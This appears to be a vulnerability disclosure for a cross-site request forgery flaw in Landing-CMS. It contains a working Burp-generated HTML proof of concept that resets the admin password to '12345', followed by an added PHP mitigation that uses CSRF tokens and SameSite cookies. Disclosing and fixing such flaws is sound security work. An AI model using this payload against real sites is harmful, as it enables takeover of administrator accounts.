Landing-CMS
Landing-CMS has Cross-site request forgery.
http://192.168.18.130/cms/password/
I can change the admin's password when the admin clicks the CSRF HTML file.
payload:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.18.130/cms/password/" method="POST">
<input type="hidden" name="pwd1" value="12345" />
<input type="hidden" name="pwd2" value="12345" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
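A server-side mitigation for the request above, as an added example that is not part of the original report and is not Landing-CMS code: a password-change handler that rejects any POST lacking a per-session CSRF token. It assumes a PHP handler (7.3 or later); the `pwd1`/`pwd2` field names come from the PoC, while the `csrf_token` field name and `save_admin_password()` are hypothetical.

```php
<?php
// Hypothetical hardened password-change handler (not Landing-CMS code).
// SameSite=Strict keeps the session cookie off cross-site POSTs in supporting browsers.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

// One random token per session, embedded in the form as a hidden field.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a missing or non-string field fails closed.
function csrf_valid($submitted): bool
{
    return is_string($submitted)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    $pwd1 = $_POST['pwd1'] ?? '';
    $pwd2 = $_POST['pwd2'] ?? '';
    if (!is_string($pwd1) || $pwd1 === '' || $pwd1 !== $pwd2) {
        http_response_code(400);
        exit('Passwords do not match');
    }
    // save_admin_password() is a placeholder for the application's own storage routine.
    // save_admin_password(password_hash($pwd1, PASSWORD_DEFAULT));
    unset($_SESSION['csrf_token']); // rotate the token after a successful change
    exit('Password changed');
}
?>
<form method="POST">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="password" name="pwd1">
  <input type="password" name="pwd2">
  <input type="submit" value="Change password">
</form>
```

A form hosted on another origin cannot read the session's token, so a request carrying only `pwd1` and `pwd2` is answered with 403 and the password is left unchanged.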